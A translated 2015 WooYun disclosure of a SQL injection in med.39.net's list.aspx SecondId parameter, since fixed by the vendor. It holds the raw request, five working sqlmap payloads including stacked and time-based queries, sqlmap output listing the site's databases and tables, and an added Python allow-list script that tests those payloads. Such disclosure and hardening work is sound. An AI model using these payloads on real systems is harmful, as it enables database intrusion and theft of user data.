
Vulnerability summary (followers: 24)

Defect ID: wooyun-2015-0115300

Title: SQL injection at one location on 39健康网 exposes a large number of tables

Vendor: 39健康网

Author: 路人甲

Submitted: 2015-05-21 12:17

Fixed: 2015-05-22 10:35

Disclosed: 2015-05-22 10:35

Type: SQL injection

Severity (self-assessed): High

Self-assessed Rank: 20

Status: fixed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]

Bookmarked by: 4


Vulnerability details

Disclosure status:

2015-05-21: details sent to the vendor; awaiting vendor handling
2015-05-22: vendor confirmed; details visible to the vendor only
2015-05-22: vendor fixed the vulnerability and disclosed it voluntarily; details made public

Brief description:

233

Details:

Quite similar to the previous hole. The previous one was indeed fixed, but when POSTing elsewhere the problem appeared again.
POST /cds/ssk/list.aspx?LeftNavId=8&LeftNavSubId=8&PageIndex=1&SecondId=1 HTTP/1.1
Content-Length: 194
Content-Type: application/x-www-form-urlencoded
Cookie: ***
Host: med.39.net
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.0 Safari/537.36
Accept: */*
Top1%24btnSearch=%cb%d1%20%cb%f7&Top1%24keywords=1&__EVENTVALIDATION=/wEWAwKLuYmzBwLJmJmhDQK1ua7iCo7ZrN4KLSRjbf8/Lc64b5gYwipN&__VIEWSTATE=/wEPDwUKMTI0NjM2NzQ5NGRkm%2b0HjFY8r0K9szydYFB8Qoqtpx8%3d

Proof:

---
Parameter: SecondId (GET)
Type: boolean-based blind
Title: Microsoft SQL Server/Sybase boolean-based blind - Parameter replace
Payload: LeftNavId=8&LeftNavSubId=8&PageIndex=1&SecondId=(SELECT (CASE WHEN (9263=9263) THEN 9263 ELSE 9263*(SELECT 9263 FROM master..sysdatabases) END))

Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: LeftNavId=8&LeftNavSubId=8&PageIndex=1&SecondId=1 AND 2316=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(118)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (2316=2316) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(118)+CHAR(122)+CHAR(113)))

Type: inline query
Title: Microsoft SQL Server/Sybase inline queries
Payload: LeftNavId=8&LeftNavSubId=8&PageIndex=1&SecondId=(SELECT CHAR(113)+CHAR(113)+CHAR(118)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (3237=3237) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(118)+CHAR(122)+CHAR(113))

Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: LeftNavId=8&LeftNavSubId=8&PageIndex=1&SecondId=1;WAITFOR DELAY '0:0:5'--

Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: LeftNavId=8&LeftNavSubId=8&PageIndex=1&SecondId=1 WAITFOR DELAY '0:0:5'
---
[12:00:56] [INFO] the back-end DBMS is Microsoft SQL Server
back-end DBMS: Microsoft SQL Server 2005
available databases [26]:
[*] 39Security
[*] 39Security_15
[*] 39Security_17
[*] cme
[*] cme_beta
[*] DataCenter
[*] DataSetting_test
[*] distribution
[*] master
[*] medphoto
[*] MobileData
[*] model
[*] msdb
[*] PhotoDB
[*] ProductLibData
[*] ProductLibSetting
[*] RuiHui
[*] RuiHui2012
[*] Security39
[*] SecurityNew
[*] Survey
[*] tempdb
[*] wcyx
[*] xiaopro
[*] YaYuDB
[*] YunYinDB
Database: cme
+--------------------------------------+---------+
| Table | Entries |
+--------------------------------------+---------+
| dbo.Member | 80864 |
| dbo.EmailVerify | 39151 |
| dbo.TestPaperFinish | 39048 |
| dbo.ScoreLog | 36073 |
| dbo.TestPaperFinishMain | 32101 |
| dbo.OperationLog | 27744 |
| dbo.vW_MyOperationLog | 24125 |
| dbo.vW_OperationLog | 23886 |
| dbo.PointLists | 23283 |
| dbo.ToolPreviewLog | 22221 |
| dbo.vW_ToolPreviewLog | 22221 |
| dbo.DbDiseaseToDiagnoseCriterion | 14550 |
| dbo.vw_DbDiseaseToDiagnoseCriterion | 14550 |
| dbo.Answers | 12069 |
| dbo.DbDiseaseToInternationalClass | 11406 |
| dbo.vw_DbDiseaseToInternationalClass | 11406 |
| dbo.DbResourcesToDictionary | 8567 |
| dbo.vw_DbResourcesToDictionary | 8567 |
| dbo.ToolDrugDetaRelateInfo | 8156 |
| dbo.Article | 4882 |
| dbo.CourseLog | 4822 |
| dbo.DbPic | 4416 |
| dbo.vw_dbPic | 4416 |
| dbo.PrivateMsg | 4185 |
| dbo.vW_ReceivedPrivateMessage | 4185 |
| dbo.vW_SendedPrivateMessage | 4185 |
| dbo.DbOperationToICD | 3836 |
| dbo.vw_DbOperationToICD | 3836 |
| dbo.Region | 3378 |
| dbo.CourseList | 3223 |
| dbo.Questions | 2651 |
| dbo.DbDiseaseToClinicDepartment | 2608 |
| dbo.vw_DbDiseaseToClinicDepartment | 2608 |
| dbo.OperationLogBackUp | 2527 |
| dbo.MemberCard | 1908 |
| dbo.Concern | 1752 |
| dbo.vW_Concern | 1742 |
| dbo.vW_Concerned | 1734 |
| dbo.GroupTopicReply | 1653 |
| dbo.DbSymptomCode | 1620 |
| dbo.vw_DbSymptomCode | 1620 |
| dbo.MemberCardDetail | 1580 |
| dbo.DbClass | 1562 |
| dbo.ToolActionLog | 1481 |
| dbo.DbOperationToBase | 1355 |
| dbo.vw_DbOperationToBase | 1355 |
| dbo.Collection | 1264 |
| dbo.Comment | 1190 |
| dbo.DbResource | 1139 |
| dbo.vW_DbResource | 1139 |
| dbo.vW_Comment | 1135 |
| dbo.Say | 1060 |
| dbo.vW_Say | 1060 |
| dbo.DbDrugInteractions | 1036 |
| dbo.vw_DbDrugInteractions | 1036 |
| dbo.GroupMember | 1023 |
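The report's fix section is empty, so the following is a hardening-side illustration added by the editor; it is not code from the report, from 路人甲 or from 39健康网. Every query-string parameter in the request above (LeftNavId, LeftNavSubId, PageIndex, SecondId) is an integer ID, so a strict integer allow-list applied before the value reaches the T-SQL statement rejects all five sqlmap payloads from the proof section regardless of technique; the signature table only labels which technique a rejected value resembles, for log triage. The page path, the parameter names and the SecondId payload values are taken from the report; MAX_INT, the technique labels and the constructed request lines are this example's assumptions.

```python
"""Integer allow-list plus payload triage for the list.aspx request in the report.

Added example, not code from the report or from 39健康网.  The page path, the four
query-string parameter names and the SecondId payload values are taken from the
report; MAX_INT and the technique labels are this example's assumptions.
"""
import re
from urllib.parse import parse_qs, urlencode, urlsplit

PAGE = "/cds/ssk/list.aspx"
# All four parameters in the report's request line are integer IDs.
INT_PARAMS = ("LeftNavId", "LeftNavSubId", "PageIndex", "SecondId")
MAX_INT = 10**9  # assumed bound; the real IDs on the page are single digits

# Ordered from most to least specific so the first match is the best label.
# Only used to explain WHY a value failed the allow-list; this is not a WAF.
SIGNATURES = (
    ("stacked", re.compile(r";\s*\w")),                               # 1;WAITFOR DELAY '0:0:5'--
    ("time-based", re.compile(r"\bwaitfor\s+delay\b", re.I)),         # 1 WAITFOR DELAY '0:0:5'
    ("error-based", re.compile(r"\bconvert\s*\(\s*int\s*,", re.I)),  # 1 AND 2316=CONVERT(INT,(SELECT ...
    ("subquery", re.compile(r"\(\s*select\b", re.I)),                 # (SELECT (CASE WHEN ... END))
)


def validate_int(value: str) -> bool:
    """Strict allow-list: ASCII digits only (no sign, space or comment), bounded."""
    return value.isascii() and value.isdigit() and 0 < int(value) <= MAX_INT


def classify(value: str) -> str:
    """Label a value that failed validate_int by the sqlmap technique it resembles."""
    for label, pattern in SIGNATURES:
        if pattern.search(value):
            return label
    return "non-numeric"


def triage_request(request_target: str) -> dict:
    """Verdict per integer parameter for one request target (path?query)."""
    qs = parse_qs(urlsplit(request_target).query, keep_blank_values=True)
    verdicts = {}
    for name in INT_PARAMS:
        values = qs.get(name, [])
        if len(values) != 1:
            # Absent, or supplied twice (parameter pollution): ASP.NET joins
            # duplicate keys with a comma, which is itself not a valid integer.
            verdicts[name] = "reject:missing-or-duplicated"
        elif validate_int(values[0]):
            verdicts[name] = "ok"
        else:
            verdicts[name] = "reject:" + classify(values[0])
    return verdicts


def accept(request_target: str) -> bool:
    """True only if every integer parameter passes the allow-list."""
    return all(v == "ok" for v in triage_request(request_target).values())


def build_target(second_id: str) -> str:
    """Constructed request target: the report's fixed values plus a chosen SecondId."""
    params = {"LeftNavId": "8", "LeftNavSubId": "8", "PageIndex": "1", "SecondId": second_id}
    return PAGE + "?" + urlencode(params)


# SecondId values: the legitimate one from the request line, then the five
# payloads listed in the report's sqlmap output.
SECOND_ID_SAMPLES = {
    "legit": "1",
    "boolean-blind": "(SELECT (CASE WHEN (9263=9263) THEN 9263 ELSE 9263*(SELECT 9263 FROM master..sysdatabases) END))",
    "error-based": "1 AND 2316=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(118)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (2316=2316) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(118)+CHAR(122)+CHAR(113)))",
    "inline": "(SELECT CHAR(113)+CHAR(113)+CHAR(118)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (3237=3237) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(118)+CHAR(122)+CHAR(113))",
    "stacked": "1;WAITFOR DELAY '0:0:5'--",
    "time-based": "1 WAITFOR DELAY '0:0:5'",
}


def triage_samples() -> dict:
    """SecondId verdict for every sample."""
    return {name: triage_request(build_target(v))["SecondId"] for name, v in SECOND_ID_SAMPLES.items()}


if __name__ == "__main__":
    for name, verdict in triage_samples().items():
        print(f"{name:14s} -> {verdict}")
```

Run the file to see one verdict per sample. The allow-list is a defense-in-depth layer, not the fix itself: the query behind list.aspx still has to bind SecondId as a typed parameter (a SqlParameter of SqlDbType.Int in ADO.NET) instead of concatenating it into the statement, which is the pattern the unquoted numeric payloads and the working stacked query (`SecondId=1;WAITFOR DELAY '0:0:5'--`) are consistent with.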

Fix recommendation:

~~

Copyright notice: when reposting, credit the source: 路人甲@乌云


Vulnerability response

Vendor response:

Severity (vendor-assessed): Medium

Rank: 8

Confirmed: 2015-05-22 10:34

Vendor reply:

Handled

Latest status:

2015-05-22: fixed